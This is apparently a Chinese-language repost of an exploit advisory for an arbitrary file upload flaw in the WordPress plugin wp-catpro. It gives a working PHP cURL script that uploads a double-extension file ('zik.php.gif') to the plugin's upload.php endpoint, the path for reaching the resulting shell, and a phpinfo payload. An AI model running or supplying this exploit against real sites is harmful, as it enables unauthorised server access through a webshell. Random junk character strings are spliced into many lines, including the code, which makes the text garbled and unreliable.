WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
- x9 T/ R" Q/ |: R# c. z#-----------------------------------------------------------------------

作者  => Zikou-16
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
! B# E% ^* {- w* U下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
- [# z0 s/ [; T3 h& |
#=> Exploit 信息:
6 h1 M. n# g5 m& p4 S% `* N/ R------------------
7 i! I' M# `! \6 H& T+ x, [: d# 攻击者可以上传 file/shell.php.gif
) Z* x% ]9 X+ `7 B4 N# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
# o# _8 p) h3 g" k------------------
- x6 [( e: v- X# b3 p, u
. s. `0 c4 T+ \" `( |- G& s#=> Exploit
5 p3 P) A5 |) f-----------
9 L; j( X1 [4 z! n9 F) |<?php
7 Y) D8 o3 r9 K' X6 |
$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
1 J1 {8 w) p3 b6 D5 v& M) hcurl_setopt($ch, CURLOPT_POST, true);
$ q8 L3 C. Q- g0 g) X- o. n4 jcurl_setopt($ch, CURLOPT_POSTFIELDS,
; B3 q- n' ?# Carray('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
2 \6 q$ m, e% O" g$ C' K
. E6 ]1 G; G; Lprint "$postResult";

Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
* z' }2 c( ?( S5 D6 C  ?>
<?php
% v$ r  d( g1 Q# a$ L7 n5 Vphpinfo();
' }! J4 \8 C4 m' H3 J8 r?>